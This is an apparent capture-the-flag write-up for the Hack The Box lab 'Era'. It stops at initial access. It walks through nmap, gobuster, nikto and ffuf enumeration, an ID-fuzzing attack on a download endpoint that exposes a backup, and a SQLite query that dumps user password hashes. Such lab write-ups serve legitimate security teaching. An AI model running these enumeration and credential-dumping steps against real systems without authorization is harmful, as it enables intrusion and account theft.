Era: Active, no spoiler, initial access
Era
Status = Active
Rank = Medium
Attack Machine
- Athena OS
- VMware
- open and custom toolset
Tools Used
- nmap
- ffuf
- gobuster
- hashcat
- python
HTB provided info
- Syst Linux
- Target ip:10.129.201.160
- Given credentials
- none
Initial nmapquick results
OS
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Open ports
| 1 0 80747.00 8757.51 0.0%
| 21 0 74527.20 7384.73 0.0%
|_80 0 81353.10 10908.90 0.0%
Top hit CVE’s
vulners:
| nginx 1.18.0:
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A *EXPLOIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A *EXPLOIT*
| 3F71F065-66D4-541F-A813-9F1A2F2B1D91 8.8 https://vulners.com/githubexploit/3F71F065-66D4-541F-A813-9F1A2F2B1D91 *EXPLOIT*
| NGINX:CVE-2022-41741 7.8 https://vulners.com/nginx/NGINX:CVE-2022-41741
| DF1BBDC4-B715-5ABE-985E-91DD3BB87773 7.8 https://vulners.com/githubexploit/DF1BBDC4-B715-5ABE-985E-91DD3BB87773 *EXPLOIT*
| DF041B2B-2DA7-5262-AABE-9EBD2D535041 7.8 https://vulners.com/githubexploit/DF041B2B-2DA7-5262-AABE-9EBD2D535041 *EXPLOIT*
| CVE-2022-41741 7.8 https://vulners.com/cve/CVE-2022-41741
| PACKETSTORM:167720 7.7 https://vulners.com/packetstorm/PACKETSTORM:167720 *EXPLOIT*
| NGINX:CVE-2021-23017 7.7 https://vulners.com/nginx/NGINX:CVE-2021-23017
| EDB-ID:50973 7.7 https://vulners.com/exploitdb/EDB-ID:50973 *EXPLOIT*
| CVE-2021-23017 7.7 https://vulners.com/cve/CVE-2021-23017
| B175E582-6BBF-5D54-AF15-ED3715F757E3 7.7 https://vulners.com/githubexploit/B175E582-6BBF-5D54-AF15-ED3715F757E3 *EXPLOIT*
| 9A14990B-D52A-56B6-966C-6F35C8B8EB9D 7.7 https://vulners.com/githubexploit/9A14990B-D52A-56B6-966C-6F35C8B8EB9D *EXPLOIT*
| 25F34A51-EB79-5BBC-8262-6F1876067F04 7.7 https://vulners.com/githubexploit/25F34A51-EB79-5BBC-8262-6F1876067F04 *EXPLOIT*
| 245ACDDD-B1E2-5344-B37D-5B9A0B0A1F0D 7.7 https://vulners.com/githubexploit/245ACDDD-B1E2-5344-B37D-5B9A0B0A1F0D *EXPLOIT*
| 1337DAY-ID-37837 7.7 https://vulners.com/zdt/1337DAY-ID-37837 *EXPLOIT*
| 1337DAY-ID-36300 7.7 https://vulners.com/zdt/1337DAY-ID-36300 *EXPLOIT*
| 00455CDF-B814-5424-952E-9088FBB2D42D 7.7 https://vulners.com/githubexploit/00455CDF-B814-5424-952E-9088FBB2D42D *EXPLOIT*
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 7.5 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| E73E445F-0A0D-5966-8A21-C74FE9C0D2BC 7.5 https://vulners.com/githubexploit/E73E445F-0A0D-5966-8A21-C74FE9C0D2BC *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 7.5 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 7.5 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| D228B59B-465A-509D-A681-012DB9348698 7.5 https://vulners.com/githubexploit/D228B59B-465A-509D-A681-012DB9348698 *EXPLOIT*
| CVE-2023-44487 7.5 https://vulners.com/cve/CVE-2023-44487
| C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 7.5 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 7.5 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0B1EF25-DE18-534A-AE5B-E6E87669C1D2 7.5 https://vulners.com/githubexploit/B0B1EF25-DE18-534A-AE5B-E6E87669C1D2 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 7.5 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 7.5 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| A66531EB-3C47-5C56-B8A6-E04B54E9D656 7.5 https://vulners.com/githubexploit/A66531EB-3C47-5C56-B8A6-E04B54E9D656 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 7.5 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 788E0E7C-6F5C-5DAD-9E3A-EE6D8A685F7D 7.5 https://vulners.com/githubexploit/788E0E7C-6F5C-5DAD-9E3A-EE6D8A685F7D *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 7.5 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| 40879618-C556-547C-8769-9E63E83D0B55 7.5 https://vulners.com/githubexploit/40879618-C556-547C-8769-9E63E83D0B55 *EXPLOIT*
| 1F6E0709-DA03-564E-925F-3177657C053E 7.5 https://vulners.com/githubexploit/1F6E0709-DA03-564E-925F-3177657C053E *EXPLOIT*
| 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 7.5 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT*
| CVE-2021-3618 7.4 https://vulners.com/cve/CVE-2021-3618
| NGINX:CVE-2022-41742 7.1 https://vulners.com/nginx/NGINX:CVE-2022-41742
| CVE-2022-41742 7.1 https://vulners.com/cve/CVE-2022-41742
| NGINX:CVE-2024-7347 5.7 https://vulners.com/nginx/NGINX:CVE-2024-7347
| NGINX:CVE-2025-23419 5.3 https://vulners.com/nginx/NGINX:CVE-2025-23419
|_ PACKETSTORM:162830 0.0 https://vulners.com/packetstorm/PACKETSTORM:162830 *EXPLOIT*
First steps (for me)
Note from the author (Me)
I may work in random orders compared to you, I also write these notes, mostly, as I go. I may run 4, 5, 8, terminals at once. I am sorry if some of the searches end up pointless or out of order to the final ctf. I am trying to document the things that I did, and how I pwned the box. I think the write-ups that people do, with the exact path, no mistakes, and no garbage, are a joke, like social media reels of perfection. Everyone bangs around these things. Additionally, it doesn’t help anyone if I simply give you a yellow brick road to Oz. You may need to adapt or correct some of this. -ZeroDumb
- start by running nmapquick for the default 1000 ports
While nmap runs
- set etc/hosts to 10.129.201.160 era.htb
- go to target http url “era designs” website
- check normal /extensions (login, admin, user, signin, etc.)
What type of page is it
- view-source:http://era.htb/
Find all paths
gobuster
gobuster dir -u http://era.htb -w /usr/share/payloads/seclists/Fuzzing/extension-test.txt -x php,html,js,txt -s 200,301,302,403 -b "" -t 50 -o gobuster-era.txt
nikto
nikto -h http://era.htb
- find outdated nginx which we also found in nmap
ffuf
- Directories
ffuf -u http://10.129.201.160/FUZZ/ -w /usr/share/payloads/rockyou.txt -e .php,.html,.txt -mc 200,403
- Paths
ffuf -u http://10.129.201.160/FUZZ -w /usr/share/payloads/rockyou.txt -e .php,.html,.txt -mc 200,403
ffuf -w /usr/share/payloads/wordlists/bitquark_subdomains_top100K_plus.txt \
-H "Host: FUZZ.era.htb" -u http://era.htb -mc 200
locating a door finally “file.era.htb” add to etc/hosts to view url poke around and found http://file.era.htb/register.php where you can register to become new user
congrats, now you can upload, download, scan, fuzz
moving on.
seq 0 1000 > id.txt
ffuf -u http://file.era.htb/download.php?id=FUZZ -w id.txt
-H "Cookie: PHPSESSID=<YOUR_SESS_ID_HERE>" -mc 200
You will find a file id.
We then end up at http://file.era.htb/download.php?id=54 with a hot fresh download to look at.
Download and unzip, you will eventually find an SQLite db file,
sqlite3 filedb.sqlite
SELECT user_name, user_password FROM users;
Skid it up
You can go straight to inital foothold with this if you want.
Revealed after machine retires
Full Lab
To see how we pwned our new user and became root, check back once the lab has been retired.
Judge it, hate it, love it, cringe at it. This machine was, in my humble but honest opinion, not a medium machine. It was easier than several of the easy machines I have done so far.
I Am Root
xxxxxx@era:~$ /xxx/xxxxx/xxxx
whoami
root
cd /root
cat root.txt
Question loudly so others can learn quietly. Stay curious. Stay loud.
Don’t Be A Skid -Zero